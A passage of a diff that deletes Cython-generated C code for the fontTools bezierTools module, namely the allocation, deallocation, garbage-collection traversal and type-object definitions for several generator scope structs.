__pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_t); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_t) { - e = (*v)(p->__pyx_v_t, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_slots[] = { - {Py_tp_dealloc, (void 
*)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct__genexpr", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct__genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 
0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)))) { - o = 
(PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_t); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int 
__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_t) { - e = (*v)(p->__pyx_v_t, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_1_genexpr", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_1_genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, 
/*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC[8]; -static int 
__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_v_ts); - #if CYTHON_COMPILING_IN_CPYTHON - if 
(((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)o; - if (p->__pyx_v_ts) { - e = (*v)(p->__pyx_v_ts, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_2_splitCubicAtTC", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC), - 0, - 
Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_2_splitCubicAtTC", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 
0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void 
__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_v_i); - Py_CLEAR(p->__pyx_v_pt1); - Py_CLEAR(p->__pyx_v_pt2); - Py_CLEAR(p->__pyx_v_pt3); - Py_CLEAR(p->__pyx_v_pt4); - Py_CLEAR(p->__pyx_v_ts); - Py_CLEAR(p->__pyx_t_0); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *p = (struct 
__pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)o; - if (p->__pyx_v_i) { - e = (*v)(p->__pyx_v_i, a); if (e) return e; - } - if (p->__pyx_v_pt1) { - e = (*v)(p->__pyx_v_pt1, a); if (e) return e; - } - if (p->__pyx_v_pt2) { - e = (*v)(p->__pyx_v_pt2, a); if (e) return e; - } - if (p->__pyx_v_pt3) { - e = (*v)(p->__pyx_v_pt3, a); if (e) return e; - } - if (p->__pyx_v_pt4) { - e = (*v)(p->__pyx_v_pt4, a); if (e) return e; - } - if (p->__pyx_v_ts) { - e = (*v)(p->__pyx_v_ts, a); if (e) return e; - } - if (p->__pyx_t_0) { - e = (*v)(p->__pyx_t_0, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_3__splitCubicAtTC", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_3__splitCubicAtTC", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - 
